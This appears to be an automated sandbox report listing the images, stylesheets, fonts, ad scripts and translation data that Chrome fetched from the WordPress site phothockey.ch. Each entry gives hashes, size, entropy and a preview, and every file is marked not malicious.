                                                                                                                                            SHA-512:6376D7B384A1AE41FB39442EC415DE34C7404EB911CDFC7648927245E6CFE5921CD001C7FED8AA39CFB234799D47B097ECB7E8D3FC1C08CEABE98AC385A5FF19
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:392/h:272/q:mauto/rt:fill/g:ce/ig:avif/https://phothockey.ch/wp-content/uploads/2025/01/IMG_7709.jpg
                                                                                                                                            Preview:RIFF.5..WEBPVP8X..............VP8 .4.......*....>.D.J%..&.... ..fm....(yY..D]wY...g.'......~.....v_..w.O.....+.....?....X?`=x.l}......G.k...............u.z.~.zs..|4.p............o=|]u..3[;.w....A.G.^........2S.K.%D.S.5.........{W.[......l.....3...:X........../xs\NF?..L....]A.n.-...X....._....%).w.y....si7}..J...^..t....l.....PE.L.........M.]|..Q..Q..z=..6?".t..t...eM.....N...!.[\....+...'.T..8.w..9........&.<.!.R.(Z...|n..!..h.|......p..#.g...G......G..v.u..m.?i2..=%V.$.&PZr..3w.`. k....7....>hN.....n.I.t.8F44..)1.d....a..G....9EFx..U~Q^A......cK..x..~.y.R&CJ>r].8)...;..]2....H.....s_.o..*...V.s.Rj.M%...>s.. ....#E.O1db...Q=.........Dw.?#.....t_........<.z9...x6.....R.AB.d._. R.0.'..ZSh.N&.$..%..q.^.S.....7....`..n.."Z.....("8.;..#._UB..E..*..z3.q7.AJ..r.e....@ou. ..>.$.&5...9.$?.(..HY/9r.u\...].....TYbe..c|sM....".c...J.Q.j....m.f...(.<.l...Ii..X*%..8..H0....E...?..z1....sw.........{S.&.....&.....r...2.P.(Z........$.........O_{..?0.+.~.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):578
                                                                                                                                            Entropy (8bit):6.300442652966899
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:94B95FA12C015CD52E5218BE9EC2A083
                                                                                                                                            SHA1:EF2C4F5164A4F50C84AD6DC086E51990562D41DC
                                                                                                                                            SHA-256:779726F7933FA69496AFDB31DFEC6547B38B9E6967E565D1B0AE20D3B25B45A7
                                                                                                                                            SHA-512:1B5155F6E48B88877C6CCBD06B0C8E77B1D155E0A89EFB790158DE4620E956D8011D1FC80FF713D6DEACB00AB69AF4F1ADB6BF5439558D58B51A7B47ACA17783
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:32/h:32/q:mauto/ig:avif/https://phothockey.ch/wp-content/plugins/gtranslate/flags/32/fr.png
                                                                                                                                            Preview:RIFF:...WEBPVP8X..............ALPHL....w`.m.JI!........W....&.@H*....]..d.C..."h!....cD.'.\.E..bT+...C..1.s*....VP8 .........* . .>.:.H%#.!7......l../Q.....*.l3..V.#..i....%9..9....jo..2..n.>..1+..:'!0&...........?=>?.c...._s.......J@.v.........[....$....'.kz<.....{..S...._.'.6....r...qL.$.............J..........x.5..~o..5'.....$@.....i..`3..T..O.X....`........4.k.tC..a\...EXIF....Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100.................... ........... .......
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (22521), with no line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):22521
                                                                                                                                            Entropy (8bit):5.286440087506929
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:51636DE3CE868A2172F9E6996C2934E0
                                                                                                                                            SHA1:9B5DE9F2BE0AF95B03FC43F0B1BFB9F25F81A900
                                                                                                                                            SHA-256:2AFCABE2EB6314148DFD9DFDEC1333B973D97D0780CC08FDDAB8501AFBB013E9
                                                                                                                                            SHA-512:A01C26BE01E93F32DA42F1BA642D21F8E1F828F6475CC44B916D739C0679E977FD99A7B57FD3DBD2CA6E27524717362B054886F4131D7D90BBCF7CF442DAA9A2
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://cdn.adsafeprotected.com/iasPET.1.js
                                                                                                                                            Preview:!function(e){var t={};function n(r){if(t[r])return t[r].exports;var a=t[r]={i:r,l:!1,exports:{}};return e[r].call(a.exports,a,a.exports,n),a.l=!0,a.exports}n.m=e,n.c=t,n.d=function(e,t,r){n.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:r})},n.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},n.t=function(e,t){if(1&t&&(e=n(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var r=Object.create(null);if(n.r(r),Object.defineProperty(r,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var a in e)n.d(r,a,function(t){return e[t]}.bind(null,a));return r},n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return n.d(t,"a",t),t},n.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},n.p="",n(n.s=1)}([function(e,t){},function(e,t,n){"use strict";n.r(t);n(0);var r=function(e){return{width:
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (430), with no line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):430
                                                                                                                                            Entropy (8bit):5.3871123702462596
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:0832B3CA0D7B89B3FDFDE1E470A0750D
                                                                                                                                            SHA1:608151C045EB6C441E4F1A6E24D2A307875DBD90
                                                                                                                                            SHA-256:C67B616657D482BBA6CC35055D18F7AF6BEF198D158738B935D0774A03642966
                                                                                                                                            SHA-512:CFAC585F0C368249F9314C8A2E716367280884553D5E0C2E8EE0DC77286B91CF65E0AD324DBAE6AE2A08DF58B535FCE703559BD131783F29FCE016C249A2C422
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://googleads.g.doubleclick.net/pagead/ads?gdpr=0&client=ca-pub-5534394335622311&output=html&h=280&adk=2098703246&adf=3859366563&pi=t.aa~a.3140028793~rp.1&w=358&abgtt=6&fwrn=4&fwrnh=100&lmt=1736177778&rafmt=1&to=qs&pwprc=9468878717&format=358x280&url=https%3A%2F%2Fphothockey.ch%2F&fwr=0&pra=3&rpe=1&resp_fmts=3&wgl=1&fa=40&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzIiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTMyIl0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzIiXV0sMF0.&dt=1736177777810&bpp=2&bdt=30235&idt=-M&shv=r20241212&mjsv=m202412090101&ptt=9&saldr=aa&abxe=1&cookie=ID%3D271b0c5861eb301c%3AT%3D1736177771%3ART%3D1736177771%3AS%3DALNI_MbbkKdxZ3r4oXe0CAZ1aXtk3TXpXw&gpic=UID%3D00000fa80f72307c%3AT%3D1736177771%3ART%3D1736177771%3AS%3DALNI_MYYYAF9Bdmqy81LoPXnol1uur86yA&eo_id_str=ID%3Dcfbf4971db1f6709%3AT%3D1736177771%3ART%3D1736177771%3AS%3DAA-AfjaNDk_NqCEVnmF5j0CX-A32&prev_fmts=0x0%2C1200x280%2C1140x280%2C1140x280&nras=5&correlator=3928226519857&frm=20&pv=1&u_tz=-300&u_his=1&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&u_sd=1&dmc=8&adx=851&ady=3383&biw=1280&bih=907&scr_x=0&scr_y=0&eid=95349404&oid=2&psts=AOrYGsniE92yE7oteJqKKRfefsOegqwWFwtC4f5XcCAiy01X5Sww2gbpyJcDSZgLCDwu1BWBrrEUTbr1g-R1Hjf1dzQoRfM&pvsid=2286212169202884&tmod=1523322118&uas=1&nvt=1&fc=1920&brdim=0%2C0%2C0%2C0%2C1280%2C0%2C1280%2C984%2C1280%2C907&vis=1&rsz=%7C%7Cs%7C&abl=NS&fu=128&bc=31&bz=1&td=1&tdf=0&psd=W251bGwsbnVsbCxudWxsLDNd&nt=1&ifi=5&uci=a!5&btvi=2&fsb=1&dtd=318
                                                                                                                                            Preview:<!DOCTYPE html><html><head><script>window.top.postMessage('{"msg_type":"resize-me","key_value":[{"key":"r_nh","value":"0"},{"key":"r_ifr","value":"true"},{"key":"qid","value":"CIjq2Z624YoDFf6hgwcdLc8EBg"}],"googMsgType":"sth"}', '*');</script><script>window.top.postMessage('{"msg_type":"adsense-labs","key_value":[{"key":"settings","value":"[\\\"ca-pub-5534394335622311\\\"]"}],"googMsgType":"sth"}', '*');</script></head></html>
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (65497)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):137254
                                                                                                                                            Entropy (8bit):4.832306494562431
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:B559D620CA6AB4CE85B84E82806F9D2A
                                                                                                                                            SHA1:6B9CA7A9942C56146AFCA575503138778AD52EDA
                                                                                                                                            SHA-256:3D8A48C4B9FBC84204BF0EA47818AB0FAC740DA888078225473D0748BCFE80F4
                                                                                                                                            SHA-512:0DEB836BC0F802BB52B07C813A47E4651E9825AAF8D3BE393EF721869D7282B55F6E1AACF6E695893E7AC98116B5862733AC88E65DC8EA55DA98D61BD40C62B7
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://phothockey.ch/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.5.6
                                                                                                                                            Preview:/*! elementor - v3.5.6 - 28-02-2022 */..dialog-widget-content{background-color:#fff;position:absolute;-webkit-border-radius:3px;border-radius:3px;-webkit-box-shadow:2px 8px 23px 3px rgba(0,0,0,.2);box-shadow:2px 8px 23px 3px rgba(0,0,0,.2);overflow:hidden}.dialog-message{font-size:12px;line-height:1.5;-webkit-box-sizing:border-box;box-sizing:border-box}.dialog-type-lightbox{position:fixed;height:100%;width:100%;bottom:0;left:0;background-color:rgba(0,0,0,.8);z-index:9999;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.dialog-type-lightbox .dialog-widget-content{margin:auto;width:375px}.dialog-type-lightbox .dialog-header{font-size:15px;color:#495157;padding:30px 0 10px;font-weight:500}.dialog-type-lightbox .dialog-message{padding:0 30px 30px;min-height:50px}.dialog-type-lightbox:not(.elementor-popup-modal) .dialog-header,.dialog-type-lightbox:not(.elementor-popup-modal) .dialog-message{text-align:center}.dialog-type-lightbox .dialog-buttons-wrapper
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 800x445, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):28831
                                                                                                                                            Entropy (8bit):7.970561312962283
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:7C33F62A13E8F3914F660016DD07F620
                                                                                                                                            SHA1:90B43D08C9E73E067CCE487A23EB8095A7659DEA
                                                                                                                                            SHA-256:8F4726AE73D8BC1EBEEE52E7B228C2038429F7D8D2015D81E8D06CBF2CA948D4
                                                                                                                                            SHA-512:411128665BB0DF89FE0E10F64F3EDA9AB56BBEBD94E2587D015208614F743C74C8889A030C35B755E3E41074A49FBB77085871209A3754E48C29D1EB31B1BB75
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100.................... ......................C......................"....."3 % % 3-7,),7-Q@88@Q^OJO^qeeq.........C......................"....."3 % % 3-7,),7-Q@88@Q^OJO^qeeq.............. ..".................................................................................n....T..R....V.....k...36.v.%...f6...6.;....6e..:<...~....Y....=..T....e.^.v.C.X..;K..8X.)s...5.Tu....j.g..<........!*.2.8..JP..J$%\..ieT..9n......~v....$$..BI.$.FK.H...y!..+.N;.K.a9I??K:*..C.O7.0...?s.0....L....2....Y.l.t.N...)..^M).......$](v|.E(x.JKZ....g.*...5.J.W.Q- {.p.|^$.,2VUd5vWU<\vM+.mX.=..|.uC..iW.X.R...PU5.M..."j..z..V.g+4...VAM...O%..Q=l..-P....yc..%.d....=XAY.k....z.....UhDz<\.'_o>......^d.(])x,...W.>...nY\Kw...E..*??CY...MV]].....m$.,Q...P.*.gVd.Uex../...P....m;..a.....%..J.I.L'g.H"tY.}.O6..M%.....Z.e.3.dwA...\mg.>.Z. .[.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 36588, version 1.0
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):36588
                                                                                                                                            Entropy (8bit):7.9940819064918776
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:AF25B808F44B7BA222C55A1AD21C6610
                                                                                                                                            SHA1:DAEEBEA0EBC88F184FEE3A201D583E65F6102E11
                                                                                                                                            SHA-256:ECE33EF25242231378AEFE6A8F2418EC835C0DB284BDFFE85CB96D9F391CC144
                                                                                                                                            SHA-512:59FD4702A08A1295402A37540C98E0932A48BE04568CA76C73E178B37E25EF4888741F2AAEA337D31C55ED4ECACE7E0487E0B371F76B67C7FCE8C96FD4C5590D
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://use.fontawesome.com/releases/v5.0.0/webfonts/fa-solid-900.woff2
                                                                                                                                            Preview:wOF2..............y..............................T.V..z...`..5.6.$..0..... ..z...[.8q....\oV..I.?.HD.q.!p....a.. ......;.........Ss.lk.@.....0Q18.pxR.k.`..*&F....(.,.eB1$.9c..k. z.[Z.T....l ........{..G.......~..^s...F.}..@..uT[|..S.0....K./*.IA..L.0...E.T..f...A...1iy.?..X.A33....7.z..y...p...q......k.l..........s*xg ..(...........?.|...1.c...(.....@...O...R.T... ../...].!^7. y!y...$..0...dd.a.... .......7....Z....h...])v8...+......)H.....o<....I..3.R.../.....5.+c..gY.Dt....)...4.].9.....9_J.......v.ui.l..F8...........Q...Y.TB...o.y.....0.N...{....X.c....h......;)...Z.} p.$...N..a0.....LW.^a.5M....;.......F\9....Q.}a......._...LE..g../.p....cP..i..`.b4....q..B.q.!...O.......@..JZ.V.k.;..{...v.5|:........mb.1....3....r....Q.d.}...tP.X5g.J.P......'|O..t.Kv'..CP}".g...-.h.Vj.......;....#akJ.U...=$..........aC<.3...|..E.,.j.fzS.k.RTr.....PTg...........o......P..R......A....)`)..J.):.....?e,@J.).....,.r*.....P.....+/...}........0..`....?...k
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (19004)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):19050
                                                                                                                                            Entropy (8bit):4.566561253573199
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:1867071E645872848D44E4DC23AE5C28
                                                                                                                                            SHA1:CB4DCF0C1AAA79C53C3B07984D4065CDB8B6AC36
                                                                                                                                            SHA-256:EA8148C79052A55EC1596B4598795A4FA3BC979B9ECAB3B0F6BEB130E9B1D9E5
                                                                                                                                            SHA-512:C83765519F4A7DD8A8B4EC3F76C14AC241DB94578AA3C2D62589AF92E77FF1A87EBF40CCEFCCEB8A70588FB4B500A974E1CC943EE18ED3F6BFC6F3408B663765
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://phothockey.ch/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ver=5.14.0
                                                                                                                                            Preview:/*! elementor-icons - v5.14.0 - 04-01-2022 */.@font-face{font-family:eicons;src:url(../fonts/eicons.eot?5.14.0);src:url(../fonts/eicons.eot?5.14.0#iefix) format("embedded-opentype"),url(../fonts/eicons.woff2?5.14.0) format("woff2"),url(../fonts/eicons.woff?5.14.0) format("woff"),url(../fonts/eicons.ttf?5.14.0) format("truetype"),url(../fonts/eicons.svg?5.14.0#eicon) format("svg");font-weight:400;font-style:normal}[class*=" eicon-"],[class^=eicon]{display:inline-block;font-family:eicons;font-size:inherit;font-weight:400;font-style:normal;font-variant:normal;line-height:1;text-rendering:auto;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}@keyframes a{0%{transform:rotate(0deg)}to{transform:rotate(359deg)}}.eicon-animation-spin{animation:a 2s infinite linear}.eicon-editor-link:before{content:'\e800'}.eicon-editor-unlink:before{content:'\e801'}.eicon-editor-external-link:before{content:'\e802'}.eicon-editor-close:before{content:'\e803'}.eicon-editor-list-ol:before{cont
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:PNG image data, 42 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):910
                                                                                                                                            Entropy (8bit):7.7455040862049085
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:EFA6BB2BFE459BC6F4BDAFA3DB0383F6
                                                                                                                                            SHA1:52D15CE52FE50643E542C17812DE43F4ED1B6EE0
                                                                                                                                            SHA-256:6318394F737C66F0E2CCFCD88E3935C6667633A1B95FA29FBA2B75431D55EEF2
                                                                                                                                            SHA-512:E23C04D8997F5C2F92070E09261B7EE50D9DF8753F45CF66F604F0874FFA8D99E947C97C528EC02A2C3FBE8E43D840B343A7D0225532980D5DA95031216415B7
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://www.gstatic.com/images/branding/googlelogo/1x/googlelogo_color_42x16dp.png
                                                                                                                                            Preview:.PNG........IHDR...*.........`"....UIDATx..T...=.Mm......&[....Sl..m.m....U....;.uf..frrr...v...U)...).....2Q..`.y.*...U.9..;..0.^........B.......].h.^..... . L3....jQw..vB.D....<..P.4..|.B....d..?.....Qv.....Dv..$...._.|.*.@........k....`..JG...$..T.y|T.......v.iH...yc6'...%..&.w.oI.ZS{..!6A@.Y.....a....U]..:...g-......01F........Q...k#..G\....~.+....z.>....F...}1[..~.9..r[.?..9......2~....e."1.).}[.WW.{.r...|D..<7..t.M.`..S...8.ab..F ....n..S.:n.>1(g.p$.:k1..6...Y..@.5.8.0y.....R...;.K\. 0p...g.,r.E...............=.....!.^..Y!..D.Z.....aV.....;F.4...!.`^.L.VQ.....&...d....O.\...I).!1....{......K.f*.e ....L......~.%IY(..Y.....NeA...?.^..2.C..^........P....)T.&?.zm.Sl.b..l.D...%.{.B>X{.9Y..M..:.)......EK..b.......}....|.o..].....GH?..3F.B(.:.....AdA........Z... .L....)..@?...f.F....6......u..oQfMC.....OC.1[3..j..j.G...&..D`........@>...g....IEND.B`.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 130x90, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4166
                                                                                                                                            Entropy (8bit):7.771910338694633
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:AAA8E1B70809A0CF6AE9F82F01522936
                                                                                                                                            SHA1:1D664E6B63378A72288A5618C0342611ADFCEDF2
                                                                                                                                            SHA-256:65EC6C7543B2D8C3C33A4FC51C1FE89682CA560A9ED8223AA229931DDCC4819A
                                                                                                                                            SHA-512:5AC0E02CC6C5BDF6AF4EA41E67411FAAEF38C4F0B869E01F5D505844680F97FA78C5E11B5C195B7E584F29FD976575E207462569375A9AA61E4DEDFC4FCA648D
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100................................Z..........C............................."......".$...$.6*&&*6>424>LDDL_Z_||....C............................."......".$...$.6*&&*6>424>LDDL_Z_||.......Z...."..............................................................................J.:................fV/.Zx..4.s.t..<0).*.....#..@.\9M.,....e..M.=\.....Y.{a..5W.B.<._......d..A..hPcz.....Hr.h.:.......F..,s.S.6..3.9I.*.J.t*;.+S...B=.......C..B..Pg/...6...v, ../...A.h:3..h.d.+*.....MJm8.#F...>9s...2.(.......a.....%..............................!.1A"...........x.^..kr^.Uk9K.g...W.b...\S...,UG.9.../..y'M.g..EK..`_..V.....-y.....:....=W......VOz..../..Ugo.I.yZ..r.".....a&..K...7..J......J...D.<"....^.:.{.....R.=.Sk.!I...R?...Z.?S.:...-..=.X..Y.{.......4Z3>!=Ue.2..V.0.&.&......i="&..YfS....xe+[........I...7=..4|a7...
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Unicode text, UTF-8 text
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):31238
                                                                                                                                            Entropy (8bit):3.6789428266488717
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:B7060D3B5CE888E901593AF33400CEE3
                                                                                                                                            SHA1:28FA868C9029E0B9B57FAD21E1437CFAB9C806C7
                                                                                                                                            SHA-256:8A056FD192A8EA16FCC3CC2CB33E093440EC225DC7E23584D7EE139EFD15E0F1
                                                                                                                                            SHA-512:F97199CA06D726494166D7081A45D79A9D39D6A61569374311CF5E4EF1564CD25CF0BABC77CE8221013E535C1402782414529B40E2B91DC537E737512748819F
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:// API callback.callback({. "sourceLanguages": [. {. "language": "auto",. "name": "Detect language". },. {. "language": "ab",. "name": "Abkhaz". },. {. "language": "ace",. "name": "Acehnese". },. {. "language": "ach",. "name": "Acholi". },. {. "language": "aa",. "name": "Afar". },. {. "language": "af",. "name": "Afrikaans". },. {. "language": "sq",. "name": "Albanian". },. {. "language": "alz",. "name": "Alur". },. {. "language": "am",. "name": "Amharic". },. {. "language": "ar",. "name": "Arabic". },. {. "language": "hy",. "name": "Armenian". },. {. "language": "as",. "name": "Assamese". },. {. "language": "av",. "name": "Avar". },. {. "language": "awa",. "name": "Awadhi". },. {. "language": "ay",. "name": "Aymara". },. {. "language": "az",
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):20004
                                                                                                                                            Entropy (8bit):7.985432913492813
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:4F47136C3CE7A6DCFE10114FC8AF0140
                                                                                                                                            SHA1:926FBC6156DA73EAA5444AB7108309F568056E02
                                                                                                                                            SHA-256:97B3C779257C6630A6F19937223AF7D93BF1B0AF5691F48B93828EBA7422C595
                                                                                                                                            SHA-512:237FF5AA59BEF132D4303F7C436B0D3978614A2C6A8873D242F2614EFA70AC6D4F03313978CB6D077AC00D2AE76090E3EB2EC04970BF4A0E9D7D41BB3732A0DB
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:392/h:272/q:mauto/rt:fill/g:ce/ig:avif/https://phothockey.ch/wp-content/uploads/2024/04/IMG_0450.jpg
                                                                                                                                            Preview:RIFF.N..WEBPVP8X..............VP8 <M.......*....>.@.I%..&+.H...M...mb.......~..W.NA8.w.e~..3....0_1>..............o[...C.j.4}..q..?b=;}.?............._<.N...........j_..k...~x.....~...................=.....{!.o.?...}............?m...a};=.~....m..G..td.m...j.btS....o...i..._.&.;J....U..r*..W.....M...d..\).0....N.......k>-...\vo.z.=....c.^.....|F...!1..{.......k.....P9....#.L....'T...q:..O..Cm...M..".&...FK..6....cf.-...!:_....AED.D.-...`.e8...!."..3..L..,jZ.#0s../3.EX.f......M.....@.a...G..B.N.6..?.*......O.e.v8....B.......bd\OL......d..4]{..(.5....0.>...x......#.....x1?.......~.........O..l3...%..q.&]..q....E...L..g.{.e.[y.3ayat.>:Un./..)...f=}G..Q.8....^..[.W...Q..<n>]..2...x.0.pF.._...k@.pU...X......6..u.,7.4./Tt.B..^.l.#..S..c..[......]..~z...R6gG...C..T.B.d.V.T...L.!.#.6e."y...\X..R..s.$Cf.7..C.k..7....&...*.z.y..(.....QO.......zo?.F......).La.Q.......ki.3."O.\l.|c..'h...09...?.nQ.S5....z_."L[.C.-..1.+W..R..$........?..,S.n...O`..;
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (430), with no line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):430
                                                                                                                                            Entropy (8bit):5.391928143343922
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:877CB320DB0262890EAB896FD7408BB0
                                                                                                                                            SHA1:D5D6CFCF3D9E9E83AFF58B1EF55D84E9F0F2A34F
                                                                                                                                            SHA-256:E2835AB6BECDBFC3A68E34B40B1C37442B6BFF78DDF44316B095719C4885509E
                                                                                                                                            SHA-512:6C7B1F46E919C1491655B444E6CE353C90BF48790E65A511A708CFFA9CBD56D0F046F50AD1EBB463E5078CF3226A8657BCF0BF094798C1D855C23E041B6383E1
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://googleads.g.doubleclick.net/pagead/ads?gdpr=0&client=ca-pub-5534394335622311&output=html&h=280&adk=3581611690&adf=4003291295&pi=t.aa~a.1329385220~rp.1&w=1140&abgtt=6&fwrn=4&fwrnh=100&lmt=1736177777&rafmt=1&to=qs&pwprc=9468878717&format=1140x280&url=https%3A%2F%2Fphothockey.ch%2F&fwr=0&pra=3&rpe=1&resp_fmts=3&wgl=1&fa=40&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzIiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTMyIl0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzIiXV0sMF0.&dt=1736177777810&bpp=2&bdt=30236&idt=-M&shv=r20241212&mjsv=m202412090101&ptt=9&saldr=aa&abxe=1&cookie=ID%3D271b0c5861eb301c%3AT%3D1736177771%3ART%3D1736177771%3AS%3DALNI_MbbkKdxZ3r4oXe0CAZ1aXtk3TXpXw&gpic=UID%3D00000fa80f72307c%3AT%3D1736177771%3ART%3D1736177771%3AS%3DALNI_MYYYAF9Bdmqy81LoPXnol1uur86yA&eo_id_str=ID%3Dcfbf4971db1f6709%3AT%3D1736177771%3ART%3D1736177771%3AS%3DAA-AfjaNDk_NqCEVnmF5j0CX-A32&prev_fmts=0x0%2C1200x280&nras=3&correlator=3928226519857&frm=20&pv=1&u_tz=-300&u_his=1&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&u_sd=1&dmc=8&adx=70&ady=672&biw=1280&bih=907&scr_x=0&scr_y=0&eid=95349404&oid=2&psts=AOrYGsniE92yE7oteJqKKRfefsOegqwWFwtC4f5XcCAiy01X5Sww2gbpyJcDSZgLCDwu1BWBrrEUTbr1g-R1Hjf1dzQoRfM&pvsid=2286212169202884&tmod=1523322118&uas=1&nvt=1&fc=1920&brdim=0%2C0%2C0%2C0%2C1280%2C0%2C1280%2C984%2C1280%2C907&vis=1&rsz=%7C%7Cs%7C&abl=NS&fu=128&bc=31&bz=1&td=1&tdf=0&psd=W251bGwsbnVsbCxudWxsLDNd&nt=1&ifi=3&uci=a!3&fsb=1&dtd=174
                                                                                                                                            Preview:<!DOCTYPE html><html><head><script>window.top.postMessage('{"msg_type":"resize-me","key_value":[{"key":"r_nh","value":"0"},{"key":"r_ifr","value":"true"},{"key":"qid","value":"CMHE0J624YoDFcSIgwcdrR4FRQ"}],"googMsgType":"sth"}', '*');</script><script>window.top.postMessage('{"msg_type":"adsense-labs","key_value":[{"key":"settings","value":"[\\\"ca-pub-5534394335622311\\\"]"}],"googMsgType":"sth"}', '*');</script></head></html>
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):580
                                                                                                                                            Entropy (8bit):6.32146059927836
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:1BC8F723D3AF901AEE1B895F1307EE2A
                                                                                                                                            SHA1:14FB2A854F70044BF3DE33447E7A751B94846535
                                                                                                                                            SHA-256:AF76197C603B17A61AFB27CF1C9B6E594EE617A302B663CB011D698B93F67044
                                                                                                                                            SHA-512:55599BD3CB922DE14AEE28E6946238A39C5286C61AE2ABCA42BD47D533917919240D5253A503D85C9AB0EB28F583C0C28999D96F69CF380D39D26D6FDEE7B78C
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
